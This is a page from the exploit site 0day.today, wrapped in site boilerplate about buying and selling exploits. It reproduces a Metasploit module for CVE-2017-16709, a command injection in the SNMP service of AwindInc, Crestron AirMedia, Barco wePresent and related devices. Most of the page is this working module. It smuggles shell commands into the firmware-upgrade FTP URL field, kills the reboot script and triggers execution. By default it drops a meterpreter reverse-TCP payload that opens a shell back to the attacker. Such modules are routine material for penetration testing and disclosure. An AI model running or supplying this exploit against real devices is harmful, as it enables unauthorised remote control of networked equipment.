0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

AwindInc SNMP Service - Command Injection Exploit

Author

metasploit

Risk

[

Security Risk Critical

]

0day-ID

Category

Date add

CVE

Platform

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SNMPClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "AwindInc SNMP Service Command Injection",
      'Description'    => %q{
        This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection.
        A valid SNMP read-write community is required to exploit this vulnerability.

        The following devices are known to be affected by this issue:

          * Crestron Airmedia AM-100 <= version 1.5.0.4
          * Crestron Airmedia AM-101 <= version 2.5.0.12
          * Awind WiPG-1600w <= version 2.0.1.8
          * Awind WiPG-2000d <= version 2.1.6.2
          * Barco wePresent 2000 <= version 2.1.5.7
          * Newline Trucast 2 <= version 2.1.0.5
          * Newline Trucast 3 <= version 2.1.3.7
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Quentin Kaiser <kaiserquentin[at]gmail.com>'
        ],
      'References'     =>
        [
          ['CVE', '2017-16709'],
          ['URL', 'https://github.com/QKaiser/awind-research'],
          ['URL', 'https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/']
        ],
      'DisclosureDate' => '2019-03-27',
      'Platform'       => ['unix', 'linux'],
      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
      'Privileged'     => true,
      'Targets'        => [
        ['Unix In-Memory',
          'Platform'    => 'unix',
          'Arch'        => ARCH_CMD,
          'Type'        => :unix_memory,
          'Payload'     => {
            'Compat'    => {'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl'}
          }
        ],
        ['Linux Dropper',
          'Platform'    => 'linux',
          'Arch'        => ARCH_ARMLE,
          'CmdStagerFlavor' => %w[wget],
          'Type'        => :linux_dropper
        ]
      ],
      'DefaultTarget'  => 1,
      'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'}))

    register_options(
      [
        OptString.new('COMMUNITY', [true, 'SNMP Community String', 'private']),
      ])
  end


  def check
    begin
      connect_snmp
      sys_description = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
      print_status("Target system is #{sys_description}")
      # AM-100 and AM-101 considered EOL, no fix so no need to check version.
      model = sys_description.scan(/Crestron Electronics (AM-100|AM-101)/).flatten.first
      case model
      when 'AM-100', 'AM-101'
          return CheckCode::Vulnerable
      else
          # TODO: insert description check for other vulnerable models (that I don't have)
          # In the meantime, we return 'safe'.
          return CheckCode::Safe
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
    Exploit::CheckCode::Unknown
  end

  def inject_payload(cmd)
    begin
      connect_snmp
      varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,1,0],SNMP::OctetString.new(cmd))
      resp = snmp.set(varbind)
      if resp.error_status == :noError
        print_status("Injection successful")
      else
        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
  end

  def trigger
    begin
      connect_snmp
      varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,5,0],SNMP::Integer32.new(1))
      resp = snmp.set(varbind)
      if resp.error_status == :noError
        print_status("Trigger successful")
      else
        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
  end

  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end

  def execute_command(cmd, opts = {})
    # The payload must start with a valid FTP URI otherwise the injection point is not reached
    cmd = "ftp://1.1.1.1/$(#{cmd.to_s})"

    # When the FTP download fails, the script calls /etc/reboot.sh and we loose the callback
    # We therefore kill /etc/reboot.sh before it reaches /sbin/reboot with that command and
    # keep our reverse shell opened :)
    cmd << "$(pkill -f /etc/reboot.sh)"

    # the MIB states that camFWUpgradeFTPURL must be 255 bytes long so we pad
    cmd << "A" * (255-cmd.length)

    # we inject our payload in camFWUpgradeFTPURL
    print_status("Injecting payload")
    inject_payload(cmd)

    # we trigger the firmware download via FTP, which will end up calling this
    # "/bin/getRemoteURL.sh %s %s %s %d"
    print_status("Triggering call")
    trigger
  end
end

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

AwindInc SNMP Service - Command Injection Exploit

Report Error

Report Error